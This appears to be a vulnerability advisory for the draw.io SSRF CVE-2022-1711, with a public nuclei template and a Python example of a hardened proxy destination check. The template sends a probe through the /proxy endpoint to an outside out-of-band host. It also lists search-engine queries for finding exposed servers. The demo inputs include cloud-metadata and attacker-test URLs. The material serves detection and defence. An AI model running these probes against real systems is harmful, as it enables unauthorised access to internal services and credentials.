CVE-2022-1711: draw.io < 18.0.5 - Server Side Request Forgery (SSRF)

Date: 2025-08-01 | Affected software: draw.io | PoC: public

Vulnerability description

Server-Side Request Forgery (SSRF) in draw.io (also known as diagrams.net) prior to version 18.0.5 allows an unauthenticated attacker to bypass the URL validation in the ProxyServlet component. The proxy endpoint (/proxy?url=...) fetches the supplied URL from the server without adequately restricting where that URL may point, so an attacker can make the server issue requests to internal services or to arbitrary external hosts. This can expose internal resources that are not reachable from the attacker's network position and enable data exfiltration. The fix in 18.0.5 adds an isLinkLocalAddress() check on the proxy destination.

PoC code [public] (nuclei template)

id: CVE-2022-1711

info:
  name: draw.io < 18.0.5 - Server Side Request Forgery (SSRF)
  author: ritikchaddha
  severity: high
  description: |
    Server-Side Request Forgery (SSRF) vulnerability in draw.io (also known as diagrams.net) prior to version 18.0.5 allows attackers to bypass URL validation restrictions in the ProxyServlet component. The vulnerability exists because the application does not properly validate URLs passed to its proxy endpoint, allowing attackers to make requests to internal services or external servers. This can lead to unauthorized access to internal resources and potential data exfiltration.
  remediation: |
    Update to draw.io/diagrams.net version 18.0.5 or later. The patch adds isLinkLocalAddress() checks to restrict proxy request destinations. If patching isn't possible, implement network controls to limit server connections to internal systems.
  reference:
    - https://huntr.dev/bounties/c32afff5-6ad5-4d4d-beea-f55ab4925797
    - https://github.com/jgraph/drawio/commit/cf5c78aa0f3127fb10053db55b39f3017a0654ae
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1711
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-1711
    cwe-id: CWE-918
    epss-score: 0.26189
    epss-percentile: 0.96118
  metadata:
    vendor: diagrams
    product: drawio
    verified: true
    shodan-query: html:"draw.io"
    fofa-query: body="draw.io"
  tags: cve,cve2022,ssrf,drawio,diagrams,jgraph

http:
  - method: GET
    path:
      - "{{BaseURL}}/proxy?url=http://{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(interactsh_protocol, 'dns')"
          - "contains(content_type, 'application/octet-stream')"
        condition: and
# digest: 4b0a00483046022100f1bb85edeaa57020ebc96c06c64b70a9299e2ee87c5ff95e2744db9630e7baf7022100839a839745c43097099095500307bb21d2f898a18eff743de7acbc5250035b62:922c64590222798bb761d5b6d8e72950
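The destination check that the description and the remediation above describe, written here as an added example in Python rather than draw.io's Java ProxyServlet (this is not the project's own code). It goes beyond the isLinkLocalAddress() check the page mentions: it refuses every address that is not globally routable (loopback, link-local including the 169.254.169.254 cloud metadata service, RFC 1918, CGNAT, reserved), resolves DNS names before checking so a name that points at an internal address is caught, unwraps IPv4-mapped IPv6 so ::ffff:127.0.0.1 is not missed, and pins the vetted IP so the request cannot be re-resolved elsewhere. The scheme-only `vulnerable_is_allowed` stands in for a proxy with no destination check. The hostnames and the `FAKE_DNS` table are constructed for offline demonstration and are not real records.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def vulnerable_is_allowed(url: str) -> bool:
    """Scheme-only check: stands in for a proxy that validates the URL's shape
    but not where it points.  http://127.0.0.1/ and http://169.254.169.254/
    both pass.  (Illustrative; not draw.io's pre-fix code.)"""
    try:
        return urlsplit(url).scheme.lower() in ALLOWED_SCHEMES
    except ValueError:
        return False


def resolve_all(host: str) -> set[str]:
    """Default resolver: every address the OS would use for `host`."""
    try:
        return {info[4][0] for info in socket.getaddrinfo(host, None)}
    except socket.gaierror as exc:
        raise ValueError(f"cannot resolve {host!r}: {exc}") from exc


def is_internal(addr: str) -> bool:
    """True for any address a user-supplied proxy target must not reach.
    `is_global` is False for loopback, link-local (incl. 169.254.169.254),
    RFC 1918, CGNAT 100.64/10, reserved, multicast and unspecified ranges.
    IPv4-mapped IPv6 is unwrapped first so ::ffff:127.0.0.1 is judged as
    127.0.0.1 and ::ffff:93.184.216.34 is not wrongly blocked."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not ip.is_global


def check_proxy_target(url: str, resolver=resolve_all) -> str:
    """Validate a proxy destination and return the single IP to connect to.
    Raises ValueError with the reason when the URL must be refused."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {parts.scheme!r} not allowed")
    host = parts.hostname  # strips userinfo (user@), port and IPv6 brackets
    if not host:
        raise ValueError("missing host")
    try:
        ipaddress.ip_address(host)
        addrs = {host}  # literal IP: nothing to resolve
    except ValueError:
        addrs = resolver(host)  # DNS name: check what it actually resolves to
    if not addrs:
        raise ValueError(f"{host!r} resolved to nothing")
    bad = sorted(a for a in addrs if is_internal(a))
    if bad:  # any internal record rejects the whole name (mixed A records)
        raise ValueError(f"{host!r} resolves to non-public address(es) {bad}")
    # Pin one vetted address: connect to this IP, not to the hostname, so the
    # name cannot be re-resolved to something else (DNS rebinding) later.
    return sorted(addrs)[0]


def is_allowed(url: str, resolver=resolve_all) -> bool:
    try:
        check_proxy_target(url, resolver)
        return True
    except ValueError:
        return False


# Constructed DNS table for offline demonstration (hypothetical names/records).
FAKE_DNS = {
    "example.com": {"93.184.216.34"},
    "localhost": {"127.0.0.1", "::1"},
    "intranet.corp": {"10.1.2.3"},
    "metadata.attacker.test": {"169.254.169.254"},
    "mixed.attacker.test": {"93.184.216.34", "127.0.0.1"},
}


def fake_resolver(host: str) -> set[str]:
    try:
        return FAKE_DNS[host]
    except KeyError:
        raise ValueError(f"cannot resolve {host!r}") from None


if __name__ == "__main__":
    for u in ["http://example.com/", "http://127.0.0.1:8080/",
              "http://[::ffff:127.0.0.1]/", "http://169.254.169.254/latest/meta-data/",
              "http://metadata.attacker.test/", "http://mixed.attacker.test/",
              "http://example.com@127.0.0.1/", "file:///etc/passwd"]:
        print(f"{u:45} scheme-only={vulnerable_is_allowed(u)!s:5} "
              f"hardened={is_allowed(u, fake_resolver)}")
```

Two caveats remain even with this check: a proxy that follows HTTP redirects must re-run the check on every hop, since a public host can 302 to an internal address, and the HTTP client must actually connect to the pinned IP (setting the Host header separately) rather than re-resolving the name.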